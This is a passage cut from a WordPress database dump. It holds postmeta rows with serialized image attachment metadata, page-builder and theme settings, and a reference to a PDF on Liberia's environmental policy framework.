315769223200539_7870423496580352605_o-1536x806.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:806;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23682,3461,'_wp_attached_file','2021/01/118302200_315769263200535_3757459247192883262_o.jpg'),(23683,3461,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1747;s:6:\"height\";i:1560;s:4:\"file\";s:59:\"2021/01/118302200_315769263200535_3757459247192883262_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118302200_315769263200535_3757459247192883262_o-300x268.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:268;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118302200_315769263200535_3757459247192883262_o-1024x914.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:914;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118302200_315769263200535_3757459247192883262_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118302200_315769263200535_3757459247192883262_o-768x686.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:686;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118302200_315769263200535_3757459247192883262_o-1536x1372.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1372;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23684,3462,'_wp_attached_file','2021/01/118306768_315769376533857_4579108221415119983_o.jpg'),(23685,3462,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2036;s:6:\"height\";i:1219;s:4:\"file\";s:59:\"2021/01/118306768_315769376533857_4579108221415119983_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118306768_315769376533857_4579108221415119983_o-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118306768_315769376533857_4579108221415119983_o-1024x613.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:613;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118306768_315769376533857_4579108221415119983_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118306768_315769376533857_4579108221415119983_o-768x460.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:460;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118306768_315769376533857_4579108221415119983_o-1536x920.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:920;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23686,3463,'_wp_attached_file','2021/01/118339529_315768879867240_8957022521755584142_o.jpg'),(23687,3463,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1979;s:6:\"height\";i:1191;s:4:\"file\";s:59:\"2021/01/118339529_315768879867240_8957022521755584142_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118339529_315768879867240_8957022521755584142_o-300x181.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:181;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118339529_315768879867240_8957022521755584142_o-1024x616.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:616;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118339529_315768879867240_8957022521755584142_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118339529_315768879867240_8957022521755584142_o-768x462.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118339529_315768879867240_8957022521755584142_o-1536x924.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:924;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23688,3464,'_wp_attached_file','2021/01/118374891_315769406533854_4610821984961538987_o.jpg'),(23689,3464,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1956;s:6:\"height\";i:1170;s:4:\"file\";s:59:\"2021/01/118374891_315769406533854_4610821984961538987_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118374891_315769406533854_4610821984961538987_o-300x179.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:179;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118374891_315769406533854_4610821984961538987_o-1024x613.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:613;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118374891_315769406533854_4610821984961538987_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118374891_315769406533854_4610821984961538987_o-768x459.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:459;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118374891_315769406533854_4610821984961538987_o-1536x919.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:919;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23690,3465,'_wp_attached_file','2021/01/118516642_318832852894176_1811083475951686199_o.jpg'),(23691,3465,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118516642_318832852894176_1811083475951686199_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118516642_318832852894176_1811083475951686199_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118516642_318832852894176_1811083475951686199_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118516642_318832852894176_1811083475951686199_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118516642_318832852894176_1811083475951686199_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118516642_318832852894176_1811083475951686199_o-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23692,3466,'_wp_attached_file','2021/01/118517244_318828242894637_3179541288288323454_o.jpg'),(23693,3466,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118517244_318828242894637_3179541288288323454_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118517244_318828242894637_3179541288288323454_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118517244_318828242894637_3179541288288323454_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118517244_318828242894637_3179541288288323454_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118517244_318828242894637_3179541288288323454_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118517244_318828242894637_3179541288288323454_o-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23694,3467,'_wp_attached_file','2021/01/118521094_318828412894620_1359866884748954037_o.jpg'),(23695,3467,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118521094_318828412894620_1359866884748954037_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118521094_318828412894620_1359866884748954037_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118521094_318828412894620_1359866884748954037_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118521094_318828412894620_1359866884748954037_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118521094_318828412894620_1359866884748954037_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118521094_318828412894620_1359866884748954037_o-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23696,3468,'_wp_attached_file','2021/01/118531582_318831672894294_733920385961592984_o.jpg'),(23697,3468,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:58:\"2021/01/118531582_318831672894294_733920385961592984_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"118531582_318831672894294_733920385961592984_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"118531582_318831672894294_733920385961592984_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"118531582_318831672894294_733920385961592984_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"118531582_318831672894294_733920385961592984_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118531582_318831672894294_733920385961592984_o-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23698,3469,'_wp_attached_file','2021/01/118532262_318828476227947_6854980371134826307_o.jpg'),(23699,3469,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118532262_318828476227947_6854980371134826307_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118532262_318828476227947_6854980371134826307_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118532262_318828476227947_6854980371134826307_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118532262_318828476227947_6854980371134826307_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118532262_318828476227947_6854980371134826307_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118532262_318828476227947_6854980371134826307_o-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23700,3470,'_wp_attached_file','2021/01/118534938_318828726227922_3755715513135385658_o.jpg'),(23701,3470,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118534938_318828726227922_3755715513135385658_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118534938_318828726227922_3755715513135385658_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118534938_318828726227922_3755715513135385658_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118534938_318828726227922_3755715513135385658_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118534938_318828726227922_3755715513135385658_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118534938_318828726227922_3755715513135385658_o-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23702,3471,'_wp_attached_file','2021/01/118536633_318828566227938_5387686246171594942_o.jpg'),(23703,3471,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118536633_318828566227938_5387686246171594942_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118536633_318828566227938_5387686246171594942_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118536633_318828566227938_5387686246171594942_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118536633_318828566227938_5387686246171594942_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118536633_318828566227938_5387686246171594942_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118536633_318828566227938_5387686246171594942_o-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23704,3472,'_wp_attached_file','2021/01/118538060_318831209561007_4651513210745790421_o.jpg'),(23705,3472,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118538060_318831209561007_4651513210745790421_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118538060_318831209561007_4651513210745790421_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118538060_318831209561007_4651513210745790421_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118538060_318831209561007_4651513210745790421_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118538060_318831209561007_4651513210745790421_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118538060_318831209561007_4651513210745790421_o-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23706,3473,'_wp_attached_file','2021/01/118580522_318831586227636_510067784901104873_o.jpg'),(23707,3473,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:58:\"2021/01/118580522_318831586227636_510067784901104873_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"118580522_318831586227636_510067784901104873_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"118580522_318831586227636_510067784901104873_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"118580522_318831586227636_510067784901104873_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"118580522_318831586227636_510067784901104873_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118580522_318831586227636_510067784901104873_o-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23708,3433,'_elementor_edit_mode','builder'),(23709,3433,'_elementor_template_type','wp-page'),(23710,3433,'_elementor_version','3.0.16'),(23716,1747,'_last_editor_used_jetpack','classic-editor'),(23721,3478,'_wp_attached_file','2019/11/Analysis-of-Liberia-Environmental-Policy-Framework-2.pdf'),(23723,1747,'_pods_attached_document','a:1:{i:0;i:3478;}'),(23727,3479,'_jetpack_related_posts_cache','a:2:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628720725;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3727;}i:1;a:1:{s:2:\"id\";i:2956;}i:2;a:1:{s:2:\"id\";i:3482;}}}s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1628762608;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3727;}i:1;a:1:{s:2:\"id\";i:2956;}i:2;a:1:{s:2:\"id\";i:3482;}i:3;a:1:{s:2:\"id\";i:3534;}i:4;a:1:{s:2:\"id\";i:3749;}i:5;a:1:{s:2:\"id\";i:3313;}}}}'),(23728,3479,'_edit_lock','1612786312:42'),(23729,3479,'_last_editor_used_jetpack','block-editor'),(23730,3480,'_wp_attached_file','2021/02/WWD.jpg'),(23731,3480,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:531;s:4:\"file\";s:15:\"2021/02/WWD.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"WWD-300x156.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"WWD-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"WWD-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23734,3479,'_thumbnail_id','3480'),(23735,3479,'_edit_last','42'),(23736,3479,'ocean_gallery_link_images','off'),(23737,3479,'ocean_sidebar','0'),(23738,3479,'ocean_second_sidebar','0'),(23739,3479,'ocean_disable_margins','enable'),(23740,3479,'ocean_display_top_bar','default'),(23741,3479,'ocean_display_header','default'),(23742,3479,'ocean_center_header_left_menu','0'),(23743,3479,'ocean_custom_header_template','0'),(23744,3479,'ocean_header_custom_menu','0'),(23745,3479,'ocean_menu_typo_font_family','0'),(23746,3479,'ocean_disable_title','default'),(23747,3479,'ocean_disable_heading','default'),(23748,3479,'ocean_disable_breadcrumbs','default'),(23749,3479,'ocean_display_footer_widgets','default'),(23750,3479,'ocean_display_footer_bottom','default'),(23751,3479,'ocean_custom_footer_template','0'),(23752,3479,'ocean_link_format_target','self'),(23753,3479,'ocean_quote_format_link','post'),(23754,3479,'osh_disable_topbar_sticky','default'),(23755,3479,'osh_disable_header_sticky','default'),(23756,3479,'osh_sticky_header_style','default'),(23757,3482,'_jetpack_related_posts_cache','a: